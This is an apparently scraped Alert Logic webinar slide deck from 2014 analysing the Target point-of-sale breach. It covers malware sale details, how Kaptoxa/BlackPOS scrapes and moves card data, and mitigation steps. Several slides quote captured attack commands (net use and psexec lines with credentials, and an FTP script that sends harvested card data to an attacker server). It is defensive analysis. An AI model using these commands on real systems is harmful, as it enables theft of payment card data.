The Target Breach: Anatomy of an Attack

33 %
67 %
Information about The Target Breach: Anatomy of an Attack

Published on February 4, 2014

Author: AlertLogic



Alert Logic's Security Research Team examines the anatomy of a breach

The Target Data Breach: Anatomy of an Attack February 4, 2014 Stephen Coty Director, Threat Research > Diane Garey Product Marketing

Today Agenda • What’s in the News • About POS Malware • How the Malware Works • How to Protect Yourself Logistics • Ask a question anytime using the “Question Box” • Look for slides on the Alert Logic SlideShare account • You’ll get an email with a link to today’s recording • Live Tweet today’s event #AlertLogic_ACID > 2

30 Days of the Target Breach Dec 18th > Jan 10th Jan 15th 3 Jan 17th

You Never Want to Send This Communication > 4

What’s Being Reported About the Attack • Malicious software infects POS systems and sends credit card data via FTP • Possibly home grown POS system running Windows OS • Malware traced to Russia & sold to 60 European cyber criminals > About the Impact • 110 million customers affected • Data being sold on the underground market • Eight other retailers have been compromised • Arrests being made on people using the cards 5

Malware for Sale • Went into testing Feb 12, 2013 under the title: – “Dump CC memory grabber (pos-trojan)” • Underground community laughed at the outrageous price • Currently not being sold due to Ree[4] selling out buyers Economy Version Budget Version • • • • • • > Implemented by sending protakolu FTP Log is not encrypted 1st updated edition free Rebuild product 200 $ (max 3) No support $1800 • • • • • Implemented by sending protakolu FTP Log encrypted invented us cipher Free updates for 3 months. Rebuild 100 $ (max 5) Support $2000 6 Full Version • • • • • Shipping through the gate Log encrypted cipher invented by us Free updates for life. Rebuild further by $ 100 $2300

More Malware Sales Details • License agreement (translated from Russian) – “You use the program on your own risk and creators assume no responsibility for your further use of this software. When buying, you automatically accept rules. Transfer programs and reselling third parties is prohibited and threatened deprivation of licenses and just what is included in your version.” • Seller Information – – – – E-mail 1: E-mail 2: ICQ: 565033 Skype: s.r.a.ree4 > 7

Stolen Credit Cards are Selling for $15-60 Initial dumps: ~$12 average Recent dumps: ~$15-60 range > 8

How the Malware (Kaptoxa-Rescator) Works Disables firewall • Creates an autorun entry to launch at boot Saves data • To a default .dll file Infects POS System • dum.exe exectutes mmom.exe Establishes share • net.exe/net1.exe creates Windows share 9 > Scrapes memory • Scrapes tracks 1 &2 from credit card data Stores and forwards data • To internal server as a txt file that sends data to an external FTP server controlled by attackers

Normal POS Activity: Pre-Infection

Post-Infection Activity: Step 1 New Service 11

Post-Infection Activity: Step 1.1 Looks like a regular user Starts POSWDS

Post-Infection Activity: Step 1.2 net.exe: establishes Windows share Filtering for commands: <---- cmd that was issued and captured in malware analysis cmd.exe /c move C:WINDOWSsystem32net.EXE net start POSWDS C:WINDOWSsystem32cmd.exe /c net use S:$WINDOWStwain_32a.dll /user:ttcopscli3acsBest1_user BackupU$

Post-Infection Activity: Step 2 BackDoor-FBPL takes the following actions: Step 1 C:WINDOWSsystem32cmd.exe /c psexec /accepteula -u ttcopscli3acsBest1_user -p BackupU$r cmd /c "taskkill /IM bladelogic.exe /F” Step 2 c:windowssystem32cmd.exe /c psexec /accepteula -u ttcopscli3acsBest1_user -p BackupU$r cmd -d bladelogic BackDoor-FBPL sleeps until the predetermined time of 10:00am and 5:00pm then runs: Step 1 C:WINDOWSsystem32cmd.exe /c move C:data_2014_1_20_17_53.txt <-- Name created by date and time from system

BMC Whitepaper > 15

Post-Infection Activity: Step 2 continued Step 2: Write data to a text file (cmd.txt) open digitalw Crysis1089 cd etc cd bin send C:data_2014_1_20_17_53.txt quit Step 3 Command Line c:windowssystem32cmd.exe /c ftp -s:c:program filesxxxxxxxxxxtempcmd.txt> c:xxxxxxxxxxtempcmd.txt 16

Theory: How the Malware was Delivered Ariba Vendor Portal > 17

Theory: How the Malware was Delivered Login to Portal > 18

Theory: How the Malware was Injected NCR POS Terminals > 19

Evolution of Target POS Malware AlinaPOS DexterPOS v1 Created v2 Encryption, v2.1 Logging v3.2 & 5.2 Exfiltration Steals the process list from an infected machine while parsing memory dumps 2008 Memory Dumper Copy a specific process in memory > 2010 2012 2013 VSkimmer Detect card readers, grab information, send data to a control server 20 BlackPOS / Kaptoxa / Rescator

Kaptoxa & Others Originated from Dexter • Dexter: – Able to read process memory from infected machines – Parses memory dumps looking for track 1 & 2 of the credit card data • Infected POS systems in 40 countries – 42% of the systems infected were in NA – 19% in the UK • Targeted Windows OS > 21

How to Mitigate Risk • Scan POS systems with your choice of antivirus • Check for the removal of autorun keys • • HKLMSOFTWAREMicrosoftWindowsCurrentVersionRun with the value "svchit” Contact us for a Check for removal of three executables copy of our • %USERPROFILE%/svchst.exe Malware Analysis • Dum.exe Report • Mmon.exe • Disable external FTP access outbound from the POS system on the network vs the host itself • Create a whitelist of acceptable external addresses using IP filtering rules or Access Control Lists (ACL) > 22

Credits to the Sources of Data • • • • • > 23

Join Tomorrow’s Webinar Delivering Real Protection: Alert Logic Security-as-a-Service • • Full managed intrusion detection and log management • Deploy anywhere your datacenter is located > 24

Thank you! To Follow our Research: #AlertLogic_ACID -> > “Malware Analysis Report”

Add a comment

Related presentations

Presentación que realice en el Evento Nacional de Gobierno Abierto, realizado los ...

In this presentation we will describe our experience developing with a highly dyna...

Presentation to the LITA Forum 7th November 2014 Albuquerque, NM

Un recorrido por los cambios que nos generará el wearabletech en el futuro

Um paralelo entre as novidades & mercado em Wearable Computing e Tecnologias Assis...

Microsoft finally joins the smartwatch and fitness tracker game by introducing the...

Related pages

What Retailers Need to Learn from the Target Breach to ...

... was compromised in the Target breach. ... Anatomy of the Breach. ... attack internal systems. Assuming Target wrote some of the code ...
Read more

The Target Data Breach: Anatomy of an Attack - YouTube

With over a hundred million customers affected and headline news stories day after day, the Target Corporation data breach is a company's worst ...
Read more

The Target Corporation Breach - Anatomy of an Attack

With over a hundred million customers affected and headline news stories day after day, the Target Corporation data breach is a company's worst security ...
Read more

target data breach — Krebs on Security

... than the exposure caused by the breach at Target, ... were involved in the December 2013 attack on Target that exposed 40 ... Krebs on Security ...
Read more

Anatomy of the Target data breach: Missed opportunities ...

Anatomy of the Target data breach: ... Anatomy of the attack Now let's look at the sequence of events that precipitated the data breach.
Read more

The Target Corporation Data Breach: Anatomy of an Attack ...

2nd Watch & Alert Logic Recorded Webinar - 4/16/14 ... Target Corporation: How can you protect yourself from the data breach? - Duration: 9:33.
Read more

New Details Of Home Depot Attack Reminiscent Of Target's ...

New Details Of Home Depot Attack Reminiscent Of Target's ... for this attack it seems to ... prevented the Target breach. No idea if either Target or ...
Read more


ABOUT ANATOMY OF AN ATTACK ... compared with $1 to $2 for U.S. credit card numbers prior to the Target Breach. 13. The Federal Bureau of Investigation ...
Read more

Inside a Targeted Point of Sale Data Breach - Brian Krebs

Inside a Targeted Point-of-Sale Data Breach ... such a large-scale attack that went undetected for ... directly implicated in the breach at Target ...
Read more